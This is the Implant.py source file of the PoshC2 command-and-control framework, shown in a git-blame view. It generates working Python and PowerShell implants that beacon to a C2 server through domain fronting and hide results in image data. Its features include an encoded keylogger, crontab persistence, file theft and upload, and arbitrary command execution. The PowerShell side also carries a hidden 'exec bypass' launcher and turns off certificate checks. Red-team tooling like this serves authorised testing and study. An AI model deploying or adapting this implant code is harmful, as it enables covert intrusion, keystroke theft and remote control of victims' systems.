PoshC2_Python/Implant.py

593 lines
31 KiB
Python
Raw Normal View History

2018-07-23 08:55:15 +00:00
#!/usr/bin/env python
from DB import *
from Colours import *
from Core import *
from AutoLoads import *
from ImplantHandler import *
import urllib2
class Implant(object):
def __init__(self, ipaddress, pivot, domain, user, hostname, arch, pid, proxy):
self.RandomURI = randomuri()
self.User = user
self.Hostname = hostname
self.IPAddress = ipaddress
self.Key = gen_key()
self.FirstSeen = (datetime.datetime.now()).strftime("%m/%d/%Y %H:%M:%S")
self.LastSeen = (datetime.datetime.now()).strftime("%m/%d/%Y %H:%M:%S")
self.PID = pid
self.Proxy = proxy
self.Arch = arch
self.Domain = domain
self.DomainFrontHeader = get_dfheader()
2018-07-23 08:55:15 +00:00
self.Alive = "Yes"
self.UserAgent = get_defaultuseragent()
self.Sleep = get_defaultbeacon()
self.ModsLoaded = ""
self.Pivot = pivot
self.KillDate = get_killdate()
self.ServerURL = new_serverurl = select_item("HostnameIP", "C2Server")
self.AllBeaconURLs = get_otherbeaconurls()
self.AllBeaconImages = get_images()
2018-08-14 22:40:35 +00:00
with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f:
self.PythonImplant = base64.b64encode(f.read())
2018-07-23 08:55:15 +00:00
self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random
hh = '%s'
2018-07-23 08:55:15 +00:00
timer = %s
icoimage = [%s]
urls = [%s]
2018-09-04 21:07:31 +00:00
kd=time.strptime("%s","%%d/%%m/%%Y")
2018-07-23 08:55:15 +00:00
useragent = ""
imbase = "%s"
2018-09-03 20:37:07 +00:00
def keylog():
# keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/modules/python/collection/osx/keylogger.py
2018-09-03 21:21:11 +00:00
import os,time,base64,subprocess,uuid
filename = "/tmp/%%s" %% uuid.uuid4().hex
b64logger = "aW1wb3J0IG9zLHRpbWUKZmlsZW5hbWUgPSAiUkVQTEFDRU1FIgpvdXRwdXQgPSBvcy5wb3BlbignZWNobyAicmVxdWlyZSBcJ2Jhc2U2NFwnO2V2YWwoQmFzZTY0LmRlY29kZTY0KFwnWkdWbUlISjFZbmxmTVY4NVgyOXlYMmhwWjJobGNqOE5DaUFnVWxWQ1dWOVdSVkpUU1U5T0xuUnZYMllnUGowZ01TNDVJQ1ltSUZKVlFsbGZWa1ZTVTBsUFRpNTBiMTltUERJdU13MEtaVzVrRFFwa1pXWWdjblZpZVY4eVh6TmZiM0pmYUdsbmFHVnlQdzBLSUNCU1ZVSlpYMVpGVWxOSlQwNHVkRzlmWmlBK1BTQXlMak1OQ21WdVpBMEtjbVZ4ZFdseVpTQW5kR2h5WldGa0p3MEtjbVZ4ZFdseVpTQW5abWxrWkd4bEp5QnBaaUJ5ZFdKNVh6SmZNMTl2Y2w5b2FXZG9aWEkvRFFweVpYRjFhWEpsSUNkbWFXUmtiR1V2YVcxd2IzSjBKeUJwWmlCeWRXSjVYekpmTTE5dmNsOW9hV2RvWlhJL0RRcHlaWEYxYVhKbElDZGtiQ2NnYVdZZ2JtOTBJSEoxWW5sZk1sOHpYMjl5WDJocFoyaGxjajhOQ25KbGNYVnBjbVVnSjJSc0wybHRjRzl5ZENjZ2FXWWdibTkwSUhKMVlubGZNbDh6WDI5eVgyaHBaMmhsY2o4TkNrbHRjRzl5ZEdWeUlEMGdhV1lnWkdWbWFXNWxaRDhvUkV3Nk9rbHRjRzl5ZEdWeUtTQjBhR1Z1SUdWNGRHVnVaQ0JFVERvNlNXMXdiM0owWlhJZ1pXeHphV1lnWkdWbWFXNWxaRDhvUm1sa1pHeGxPanBKYlhCdmNuUmxjaWtnZEdobGJpQmxlSFJsYm1RZ1JtbGtaR3hsT2pwSmJYQnZjblJsY2lCbGJITmxJRVJNT2pwSmJYQnZjblJoWW14bElHVnVaQTBLWkdWbUlHMWhiR3h2WTNNb2MybDZaU2tOQ2lBZ2FXWWdjblZpZVY4eVh6TmZiM0pmYUdsbmFHVnlQdzBLSUNBZ0lFWnBaR1JzWlRvNlVHOXBiblJsY2k1dFlXeHNiMk1vYzJsNlpTa05DaUFnWld4emFXWWdjblZpZVY4eFh6bGZiM0pmYUdsbmFHVnlQeUFOQ2lBZ0lDQkVURG82UTFCMGNpNXRZV3hzYjJNb2MybDZaU2tOQ2lBZ1pXeHpaUTBLSUNBZ0lFUk1PanB0WVd4c2IyTW9jMmw2WlNrTkNpQWdaVzVrRFFwbGJtUU5DbWxtSUc1dmRDQnlkV0o1WHpGZk9WOXZjbDlvYVdkb1pYSS9EUW9nSUcxdlpIVnNaU0JFVEEwS0lDQWdJRzF2WkhWc1pTQkpiWEJ2Y25SaFlteGxEUW9nSUNBZ0lDQmtaV1lnYldWMGFHOWtYMjFwYzNOcGJtY29iV1YwYUN3Z0ttRnlaM01zSUNaaWJHOWpheWtOQ2lBZ0lDQWdJQ0FnYzNSeUlEMGdiV1YwYUM1MGIxOXpEUW9nSUNBZ0lDQWdJR3h2ZDJWeUlEMGdjM1J5V3pBc01WMHVaRzkzYm1OaGMyVWdLeUJ6ZEhKYk1TNHVMVEZkRFFvZ0lDQWdJQ0FnSUdsbUlITmxiR1l1Y21WemNHOXVaRjkwYno4Z2JHOTNaWElOQ2lBZ0lDQWdJQ0FnSUNCelpXeG1Mbk5sYm1RZ2JHOTNaWElzSUNwaGNtZHpEUW9nSUNBZ0lDQWdJR1ZzYzJVTkNpQWdJQ0FnSUNBZ0lDQnpkWEJsY2cwS0lDQWdJQ0FnSUNCbGJtUU5DaUFnSUNBZ0lHVnVaQTBLSUNBZ0lHVnVaQTBLSUNCbGJtUU5DbVZ1WkEwS1UwMWZTME5JVWw5RFFVTklSU0E5SURNNERRcFRUVjlEVlZKU1JVNVVYMU5EVWtsUVZDQTlJQzB5RFFwTlFWaGZRVkJRWDA1QlRVVWdQU0E0TUEwS2JXOWtkV3hsSUVOaGNtSnZiZzBLSUNCcFppQnlkV0o1WHpKZk0xOXZjbDlvYVdkb1pYSS9EUW9nSUNBZ1pYaDBaVzVrSUVacFpHUnNaVG82U1cxd2IzSjBaWElOQ2lBZ1pXeHpaUTBLSUNBZ0lHVjRkR1Z1WkNCRVREbzZTVzF3YjNKMFpYSU5DaUFnWlc1a0RRb2dJR1JzYkc5aFpDQW5MMU41YzNSbGJTOU1hV0p5WVhKNUwwWnlZVzFsZDI5eWEzTXZRMkZ5WW05dUxtWnlZVzFsZDI5eWF5OURZWEppYjI0bkRRb2dJR1Y0ZEdWeWJpQW5kVzV6YVdkdVpXUWdiRzl1WnlCRGIzQjVVSEp2WTJWemMwNWhiV1VvWTI5dWMzUWdVSEp2WTJWemMxTmxjbWxoYkU1MWJXSmxjaUFxTENCMmIybGtJQ29wSncwS0lDQmxlSFJsY200Z0ozWnZhV1FnUjJWMFJuSnZiblJRY205alpYTnpLRkJ5YjJObGMzTlRaWEpwWVd4T2RXMWlaWElnS2lrbkRRb2dJR1Y0ZEdWeWJpQW5kbTlwWkNCSFpYUkxaWGx6S0hadmFXUWdLaWtuRFFvZ0lHVjRkR1Z5YmlBbmRXNXphV2R1WldRZ1kyaGhjaUFxUjJWMFUyTnlhWEIwVm1GeWFXRmliR1VvYVc1MExDQnBiblFwSncwS0lDQmxlSFJsY200Z0ozVnVjMmxuYm1Wa0lHTm9ZWElnUzJWNVZISmhibk5zWVhSbEtIWnZhV1FnS2l3Z2FXNTBMQ0IyYjJsa0lDb3BKdzBLSUNCbGVIUmxjbTRnSjNWdWMybG5ibVZrSUdOb1lYSWdRMFpUZEhKcGJtZEhaWFJEVTNSeWFXNW5LSFp2YVdRZ0tpd2dkbTlwWkNBcUxDQnBiblFzSUdsdWRDa25EUW9nSUdWNGRHVnliaUFuYVc1MElFTkdVM1J5YVc1blIyVjBUR1Z1WjNSb0tIWnZhV1FnS2lrbkRRcGxibVFOQ25CemJpQTlJRzFoYkd4dlkzTW9NVFlwRFFwdVlXMWxJRDBnYldGc2JHOWpjeWd4TmlrTkNtNWhiV1ZmWTNOMGNpQTlJRzFoYkd4dlkzTW9UVUZZWDBGUVVGOU9RVTFGS1EwS2EyVjViV0Z3SUQwZ2JXRnNiRzlqY3lneE5pa05Dbk4wWVhSbElEMGdiV0ZzYkc5amN5ZzRLUTBLYVhSMlgzTjBZWEowSUQwZ1ZHbHRaUzV1YjNjdWRHOWZhUTBLY0hKbGRsOWtiM2R1SUQwZ1NHRnphQzV1Wlhjb1ptRnNjMlVwRFFwc1lYTjBWMmx1Wkc5M0lEMGdJaUlOQ25kb2FXeGxJQ2gwY25WbEtTQmtidzBLSUNCRFlYSmliMjR1UjJWMFJuSnZiblJRY205alpYTnpLSEJ6Ymk1eVpXWXBEUW9nSUVOaGNtSnZiaTVEYjNCNVVISnZZMlZ6YzA1aGJXVW9jSE51TG5KbFppd2dibUZ0WlM1eVpXWXBEUW9nSUVOaGNtSnZiaTVIWlhSTFpYbHpLR3RsZVcxaGNDa05DaUFnYzNSeVgyeGxiaUE5SUVOaGNtSnZiaTVEUmxOMGNtbHVaMGRsZEV4bGJtZDBhQ2h1WVcxbEtRMEtJQ0JqYjNCcFpXUWdQU0JEWVhKaWIyNHVRMFpUZEhKcGJtZEhaWFJEVTNSeWFXNW5LRzVoYldVc0lHNWhiV1ZmWTNOMGNpd2dUVUZZWDBGUVVGOU9RVTFGTENBd2VEQTRNREF3TVRBd0tTQStJREFOQ2lBZ1lYQndYMjVoYldVZ1BTQnBaaUJqYjNCcFpXUWdkR2hsYmlCdVlXMWxYMk56ZEhJdWRHOWZjeUJsYkhObElDZFZibXR1YjNkdUp5QmxibVFOQ2lBZ1lubDBaWE1nUFNCclpYbHRZWEF1ZEc5ZmMzUnlEUW9nSUdOaGNGOW1iR0ZuSUQwZ1ptRnNjMlVOQ2lBZ1lYTmphV2tnUFNBd0RRb2dJR04wY214amFHRnlJRDBnSWlJTkNpQWdLREF1TGk0
modb64logger = base64.b64decode(b64logger)
modpayload = modb64logger.replace("REPLACEME",filename)
exec(modpayload)
pids = os.popen('ps aux | grep " ruby" | grep -v grep').read()
returnval = "%%s \\r\\nKeylogger started here: %%s" %% (pids, filename)
return returnval
2018-09-03 20:37:07 +00:00
def dfile(fname):
if fname:
with open(fname, "rb") as image_file:
imgbytes = image_file.read()
return "0000100001" + imgbytes
2018-07-23 08:55:15 +00:00
2018-09-03 19:33:38 +00:00
def ufile(base64file, fname):
fname = fname.replace('"','')
filebytes = base64.b64decode(base64file)
try:
output_file = open(fname, 'w')
output_file.write(filebytes)
output_file.close()
return "Uploaded file %%s" %% fname
except Exception as e:
return "Error with source file: %%s" %% e
2018-08-15 11:32:54 +00:00
def sai(delfile=False):
import uuid
filename = "/tmp/%%s.sh" %% (uuid.uuid4().hex)
2018-08-14 22:40:35 +00:00
imfull = base64.b64decode(imbase)
2018-08-15 11:32:54 +00:00
output_file = open(filename, 'w')
2018-08-14 22:40:35 +00:00
output_file.write(imfull)
output_file.close()
import subprocess
returnval = "Ran Start Another Implant - File dropped: %%s" %% filename
2018-08-15 11:32:54 +00:00
p = subprocess.Popen(["sh", filename])
if delfile:
p = subprocess.Popen(["rm", filename])
returnval = "Ran Start Another Implant - File removed: %%s" %% filename
return returnval
def persist():
import uuid, os
dircontent = "%%s/.%%s" %% (os.environ['HOME'], uuid.uuid4().hex)
os.mkdir(dircontent)
filename = "%%s/%%s_psh.sh" %% (dircontent, uuid.uuid4().hex)
imfull = base64.b64decode(imbase)
output_file = open(filename, 'w')
output_file.write(imfull)
output_file.close()
import subprocess as s
s.call("crontab -l | { cat; echo '* 10 * * * sh %%s'; } | crontab -" %% filename, shell=True)
2018-09-03 17:48:44 +00:00
return "Installing persistence via user crontab everyday at 10am: \\r\\n%%s" %% filename
def remove_persist():
import subprocess as s
s.call("crontab -l | { cat; } | grep -v '_psh.sh'| crontab -", shell=True)
2018-09-03 17:48:44 +00:00
return "Removed user persistence via crontab: \\r\\n**must delete files manually**"
2018-08-14 22:40:35 +00:00
2018-07-23 08:55:15 +00:00
def decrypt_bytes_gzip( key, data):
iv = data[0:16]
aes = get_encryption(key, iv)
data = aes.decrypt( data )
import StringIO
import gzip
infile = StringIO.StringIO(data[16:])
with gzip.GzipFile(fileobj=infile, mode="r") as f:
data = f.read()
return data
while(True):
2018-09-04 20:54:03 +00:00
cstr=time.strftime("%%d/%%m/%%Y",time.gmtime());cstr=time.strptime(cstr,"%%d/%%m/%%Y")
if cstr < kd:
key = "%s"
uri = "%s"
server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri)
2018-07-23 08:55:15 +00:00
try:
2018-09-04 20:54:03 +00:00
time.sleep(timer)
ua='%s'
if hh: req=urllib2.Request(server,headers={'Host':hh,'User-agent':ua})
else: req=urllib2.Request(server,headers={'User-agent':ua})
res=urllib2.urlopen(req);
html = res.read()
2018-07-23 08:55:15 +00:00
except Exception as e:
E = e
#print "error %%s" %% e
2018-09-04 20:54:03 +00:00
#print html
if html:
try:
returncmd = decrypt( key, html )
returncmd = returncmd.rstrip('\\0')
if "multicmd" in returncmd:
returncmd = returncmd.replace("multicmd","")
returnval = ""
split = returncmd.split("!d-3dion@LD!-d")
for cmd in split:
if cmd[:10] == "$sleeptime":
timer = int(cmd.replace("$sleeptime = ",""))
elif cmd[:13] == "download-file":
fname = cmd.replace("download-file ","")
returnval = dfile(fname)
elif cmd[:11] == "upload-file":
fullparams = cmd.replace("upload-file ","")
params = fullparams.split(":")
returnval = ufile(params[1],params[0])
elif cmd[:19] == "install-persistence":
returnval = persist()
elif cmd[:14] == "get-keystrokes":
returnval = keylog()
elif cmd[:18] == "remove-persistence":
returnval = remove_persist()
elif cmd[:19] == "startanotherimplant":
returnval = sai(delfile=True)
elif cmd[:28] == "startanotherimplant-keepfile":
returnval = sai()
elif cmd[:10] == "loadmodule":
module = cmd.replace("loadmodule","")
exec(module)
try:
import sys
import StringIO
import contextlib
@contextlib.contextmanager
def stdoutIO(stdout=None):
old = sys.stdout
if stdout is None:
stdout = StringIO.StringIO()
sys.stdout = stdout
yield stdout
sys.stdout = old
with stdoutIO() as s:
exec module
if s.getvalue():
returnval = s.getvalue()
else:
returnval = "Module loaded"
except Exception as e:
returnval = "Error with source file: %%s" %% e
elif cmd[:6] == "python":
module = cmd.replace("python ","")
try:
import sys
import StringIO
import contextlib
@contextlib.contextmanager
def stdoutIO(stdout=None):
old = sys.stdout
if stdout is None:
stdout = StringIO.StringIO()
sys.stdout = stdout
yield stdout
sys.stdout = old
with stdoutIO() as s:
exec module
returnval = s.getvalue()
except Exception as e:
returnval = "Error with source file: %%s" %% e
else:
try:
returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as exc:
returnval = "ErrorCmd: %%s" %% exc.output
server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri)
opener = urllib2.build_opener()
postcookie = encrypt(key, cmd)
data = base64.b64decode(random.choice(icoimage))
dataimage = data.ljust( 1500, '\\0' )
dataimagebytes = dataimage+(encrypt(key, returnval, gzip=True))
if hh: req=urllib2.Request(server,dataimagebytes,headers={'Host':hh,'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie})
else: req=urllib2.Request(server,dataimagebytes,headers={'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie})
res=urllib2.urlopen(req);
response = res.read()
except Exception as e:
E = e
#print "error %%s" %% e
2018-09-26 06:54:52 +00:00
w = \"\"""" % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.UserAgent)
2018-07-23 08:55:15 +00:00
self.C2Core = """
$key="%s"
$global:sleeptime = '%s'
$payloadclear = @"
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true}
`$s="$s"
`$sc="$sc"
function DEC {${function:DEC}}
function ENC {${function:ENC}}
function CAM {${function:CAM}}
function Get-Webclient {${function:Get-Webclient}}
function Primer {${function:primer}}
`$primer = primer
if (`$primer) {`$primer| iex} else {
start-sleep 1800
primer | iex }
"@
$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear)
$CompressedStream = New-Object IO.MemoryStream
$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
$DeflateStream.Dispose()
$CompressedScriptBytes = $CompressedStream.ToArray()
$CompressedStream.Dispose()
$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
$NewScript = "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`"$EncodedCompressedScript`"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"
$UnicodeEncoder = New-Object System.Text.UnicodeEncoding
$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))
$payloadraw = "powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)"
$payload = $payloadraw -replace "`n", ""
function GetImgData($cmdoutput) {
$icoimage = @(%s)
try {$image = $icoimage|get-random}catch{}
function randomgen
{
param (
[int]$Length
)
$set = "...................@..........................Tyscf".ToCharArray()
$result = ""
for ($x = 0; $x -lt $Length; $x++)
{$result += $set | Get-Random}
return $result
}
$imageBytes = [Convert]::FromBase64String($image)
$maxbyteslen = 1500
$maxdatalen = 1500 + ($cmdoutput.Length)
$imagebyteslen = $imageBytes.Length
$paddingbyteslen = $maxbyteslen - $imagebyteslen
$BytePadding = [System.Text.Encoding]::UTF8.GetBytes((randomgen $paddingbyteslen))
$ImageBytesFull = New-Object byte[] $maxdatalen
[System.Array]::Copy($imageBytes, 0, $ImageBytesFull, 0, $imageBytes.Length)
[System.Array]::Copy($BytePadding, 0, $ImageBytesFull,$imageBytes.Length, $BytePadding.Length)
[System.Array]::Copy($cmdoutput, 0, $ImageBytesFull,$imageBytes.Length+$BytePadding.Length, $cmdoutput.Length )
$ImageBytesFull
}
function Create-AesManagedObject($key, $IV) {
try {
$aesManaged = New-Object "System.Security.Cryptography.RijndaelManaged"
} catch {
$aesManaged = New-Object "System.Security.Cryptography.AesCryptoServiceProvider"
}
2018-07-23 08:55:15 +00:00
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
if ($IV) {
if ($IV.getType().Name -eq "String") {
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
}
else {
$aesManaged.IV = $IV
}
}
if ($key) {
if ($key.getType().Name -eq "String") {
$aesManaged.Key = [System.Convert]::FromBase64String($key)
}
else {
$aesManaged.Key = $key
}
}
$aesManaged
}
function Encrypt-String($key, $unencryptedString) {
$bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
[byte[]] $fullData = $aesManaged.IV + $encryptedData
#$aesManaged.Dispose()
[System.Convert]::ToBase64String($fullData)
}
function Encrypt-Bytes($key, $bytes) {
[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
$gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
$gzipStream.Write( $bytes, 0, $bytes.Length )
$gzipStream.Close()
$bytes = $output.ToArray()
$output.Close()
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
[byte[]] $fullData = $aesManaged.IV + $encryptedData
$fullData
}
function Decrypt-String($key, $encryptedStringWithIV) {
$bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)
$IV = $bytes[0..15]
$aesManaged = Create-AesManagedObject $key $IV
$decryptor = $aesManaged.CreateDecryptor();
$unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);
#$aesManaged.Dispose()
[System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)
}
function Encrypt-String2($key, $unencryptedString) {
$unencryptedBytes = [system.Text.Encoding]::UTF8.GetBytes($unencryptedString)
$CompressedStream = New-Object IO.MemoryStream
$DeflateStream = New-Object System.IO.Compression.GzipStream $CompressedStream, ([IO.Compression.CompressionMode]::Compress)
$DeflateStream.Write($unencryptedBytes, 0, $unencryptedBytes.Length)
$DeflateStream.Dispose()
$bytes = $CompressedStream.ToArray()
$CompressedStream.Dispose()
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
[byte[]] $fullData = $aesManaged.IV + $encryptedData
$fullData
}
function Decrypt-String2($key, $encryptedStringWithIV) {
$bytes = $encryptedStringWithIV
$IV = $bytes[0..15]
$aesManaged = Create-AesManagedObject $key $IV
$decryptor = $aesManaged.CreateDecryptor()
$unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)
$output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencryptedData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()
$output
#[System.Text.Encoding]::UTF8.GetString($output).Trim([char]0)
}
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
$URI= "%s"
$Server = "$s/%s"
$ServerClean = "$sc"
while($true)
{
$ServerURLS = "$($ServerClean)","$($ServerClean)"
$date = (Get-Date -Format "dd/MM/yyyy")
$date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null)
$killdate = [datetime]::ParseExact("%s","dd/MM/yyyy",$null)
if ($killdate -lt $date) {exit}
$sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9)
$newsleep = $sleeptimeran|get-random
if ($newsleep -lt 1) {$newsleep = 5}
start-sleep $newsleep
$URLS = %s
$RandomURI = Get-Random $URLS
$ServerClean = Get-Random $ServerURLS
$G=[guid]::NewGuid()
$Server = "$ServerClean/$RandomURI$G/?$URI"
try { $ReadCommand = (Get-Webclient).DownloadString("$Server") } catch {}
while($ReadCommand) {
$RandomURI = Get-Random $URLS
$ServerClean = Get-Random $ServerURLS
$G=[guid]::NewGuid()
$Server = "$ServerClean/$RandomURI$G/?$URI"
try { $ReadCommandClear = Decrypt-String $key $ReadCommand } catch {}
$error.clear()
if (($ReadCommandClear) -and ($ReadCommandClear -ne "fvdsghfdsyyh")) {
if ($ReadCommandClear.ToLower().StartsWith("multicmd")) {
$splitcmd = $ReadCommandClear -replace "multicmd",""
$split = $splitcmd -split "!d-3dion@LD!-d"
foreach ($i in $split){
$RandomURI = Get-Random $URLS
$ServerClean = Get-Random $ServerURLS
$G=[guid]::NewGuid()
$Server = "$ServerClean/$RandomURI$G/?$URI"
$error.clear()
if ($i.ToLower().StartsWith("upload-file")) {
try {
$Output = Invoke-Expression $i | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] }
$ModuleLoaded = Encrypt-String $key $result
$Output = Encrypt-String2 $key $Output
$UploadBytes = getimgdata $Output
(Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null
} catch {
$Output = "ErrorUpload: " + $error[0]
}
} elseif ($i.ToLower().StartsWith("download-file")) {
try {
Invoke-Expression $i | Out-Null
}
catch {
$Output = "ErrorLoadMod: " + $error[0]
}
} elseif ($i.ToLower().StartsWith("loadmodule")) {
try {
$modulename = $i -replace "LoadModule",""
$Output = Invoke-Expression $modulename | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
$ModuleLoaded = Encrypt-String $key "ModuleLoaded"
$Output = Encrypt-String2 $key $Output
$UploadBytes = getimgdata $Output
(Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null
} catch {
$Output = "ErrorLoadMod: " + $error[0]
}
} else {
try {
$Output = Invoke-Expression $i | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
$StdError = ($error[0] | Out-String)
if ($StdError){
$Output = $Output + $StdError
$error.clear()
}
} catch {
$Output = "ErrorCmd: " + $error[0]
}
try {
$Output = Encrypt-String2 $key $Output
$Response = Encrypt-String $key $i
$UploadBytes = getimgdata $Output
(Get-Webclient -Cookie $Response).UploadData("$Server", $UploadBytes)|out-null
} catch{}
}
}
}
elseif ($ReadCommandClear.ToLower().StartsWith("upload-file")) {
try {
$Output = Invoke-Expression $ReadCommandClear | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] }
$ModuleLoaded = Encrypt-String $key $result
$Output = Encrypt-String2 $key $Output
$UploadBytes = getimgdata $Output
(Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null
} catch {
$Output = "ErrorUpload: " + $error[0]
}
} elseif ($ReadCommandClear.ToLower().StartsWith("download-file")) {
try {
Invoke-Expression $ReadCommandClear | Out-Null
}
catch {
$Output = "ErrorLoadMod: " + $error[0]
}
} elseif ($ReadCommandClear.ToLower().StartsWith("loadmodule")) {
try {
$modulename = $ReadCommandClear -replace "LoadModule",""
$Output = Invoke-Expression $modulename | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
$ModuleLoaded = Encrypt-String $key "ModuleLoaded"
$Output = Encrypt-String2 $key $Output
$UploadBytes = getimgdata $Output
(Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null
} catch {
$Output = "ErrorLoadMod: " + $error[0]
}
} else {
try {
$Output = Invoke-Expression $ReadCommandClear | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
$StdError = ($error[0] | Out-String)
if ($StdError){
$Output = $Output + $StdError
$error.clear()
}
} catch {
$Output = "ErrorCmd: " + $error[0]
}
try {
$Output = Encrypt-String2 $key $Output
$UploadBytes = getimgdata $Output
(Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
} catch {}
}
$ReadCommandClear = $null
$ReadCommand = $null
}
break
}
}""" % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs)
#Add all db elements
def display(self):
print Colours.GREEN,""
it = self.Pivot
if (it == "OSX"):
it = "Python"
2018-09-19 20:15:39 +00:00
print "New %s implant connected: (uri=%s key=%s)" % (it, self.RandomURI, self.Key)
print "%s | Time:%s | PID:%s | Sleep:%s | %s (%s) | URL:%s" % (self.IPAddress, self.FirstSeen, self.PID, self.Sleep, (self.User+" @ "+self.Hostname), self.Arch, self.Proxy)
2018-07-23 08:55:15 +00:00
print "",Colours.END
try:
sound = select_item("Sounds","C2Server")
if sound == "Yes":
import pyttsx3
engine = pyttsx3.init()
rate = engine.getProperty('rate')
voices = engine.getProperty('voices')
engine.setProperty('voice', "english-us")
engine.setProperty('rate', rate-30)
engine.say("Nice, we have an implant")
engine.runAndWait()
except Exception as e:
EspeakError = "espeak error"
try:
apikey = select_item("APIKEY","C2Server")
mobile = select_item("MobileNumber","C2Server")
2018-09-07 11:03:57 +00:00
enotifications = select_item("EnableNotifications","C2Server")
poapitoken = select_item("APIToken","C2Server")
poapiuser = select_item("APIUser","C2Server")
2018-07-23 08:55:15 +00:00
2018-09-07 11:03:57 +00:00
if enotifications == "Yes":
import httplib, urllib
conn = httplib.HTTPSConnection("api.pushover.net:443")
conn.request("POST", "/1/messages.json",
urllib.urlencode({
"token": poapitoken,
"user": poapiuser,
"message": "NewImplant: %s @ %s" % (self.User,self.Hostname),
}), { "Content-type": "application/x-www-form-urlencoded" })
conn.getresponse()
2018-07-23 08:55:15 +00:00
2018-09-07 11:03:57 +00:00
if enotifications == "Yes" and apikey and mobile:
2018-07-23 08:55:15 +00:00
for number in mobile.split(","):
number = number.replace('"','')
url = "https://api.clockworksms.com/http/send.aspx?key=%s&to=%s&from=PoshC2&content=NewImplant:%s\%s @ %s" % (apikey, number, self.Domain,self.User,self.Hostname)
url = url.replace(" ","+")
response = urllib2.urlopen(url)
except Exception as e:
print "SMS send error: %s" % e
def save(self):
new_implant(self.RandomURI, self.User, self.Hostname, self.IPAddress, self.Key, self.FirstSeen, self.FirstSeen, self.PID, self.Proxy, self.Arch, self.Domain, self.Alive, self.Sleep, self.ModsLoaded, self.Pivot)
def autoruns(self):
new_task("loadmodule Implant-Core.ps1", self.RandomURI)
update_mods("Implant-Core.ps1", self.RandomURI)
result = get_autoruns()
if result:
autoruns = ""
for autorun in result:
new_task(autorun[1], self.RandomURI)